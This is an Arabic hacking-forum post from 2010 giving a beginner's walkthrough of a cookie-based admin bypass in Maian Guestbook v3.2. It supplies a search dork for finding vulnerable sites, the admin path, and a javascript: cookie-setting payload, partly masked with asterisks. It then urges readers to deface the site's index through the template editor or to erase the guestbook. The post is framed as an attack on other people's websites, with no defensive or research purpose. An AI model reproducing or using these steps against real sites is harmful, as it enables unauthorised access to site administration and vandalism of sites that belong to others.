التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > حقن xss - ssi

 
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 08-27-2010, 07:33 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية MadaRaXP
 

 

 
إحصائية العضو







MadaRaXP غير متواجد حالياً

إرسال رسالة عبر MSN إلى MadaRaXP

 

 

إحصائية الترشيح

عدد النقاط : 10
MadaRaXP is on a distinguished road

افتراضي ثغرة الكوكيز Maian Guestbook


الثغرة بسيطة و هي تغرة كوكيز
و يمكنك اختراق لوحة التحكم
هي قديمة لكنها بداية جديدة بالنسبة لنا كمبتدئين
كود البحث هو :Powered by Maian Guestbook v3.2 ابحث على اليهوا احسن

الإسغلال
أولا ادخل لأدمن السكريبت باضافة المسار "/admin/index.php"
تم اضافة السكريبت
j a v a s c r i p t:********.****** = "gbook_******=1; path=/";

تم عد بالوراء و ادخل على الأدمن و عدل على بيانات الموقع
هناك احتمال ان يكون الأدمن مصرح للكتابة على الملفات
ستجد خيار templete و اضف فيه الكود الخاص بالأندكس ،،
وربما قد لا يكن مصرح
يكفي بالتحكم بالسجل و محو ما تريد و اضف لمستك الخاصة ///

الموضوع من عملي و كود الثغرة من هنا ،،
http://www.exploit-db.com/exploits/6061/




eyvm hg;,;d. Maian Guestbook

   

رد مع اقتباس
 

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
شرحـ ثغرة الكوكيز ccmail MATRIX ALGERIA قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات 6 10-24-2011 12:04 AM
شرح ثغرة الكوكيز ViRuS Qalaa قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات 13 10-23-2011 11:35 PM
[Product] : سجل الزوار Guestbook - Version 2.2 - تعريب omardealo The Final Doom قســم تطويــر المــــواقع 0 03-08-2009 05:12 AM


الساعة الآن 08:45 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0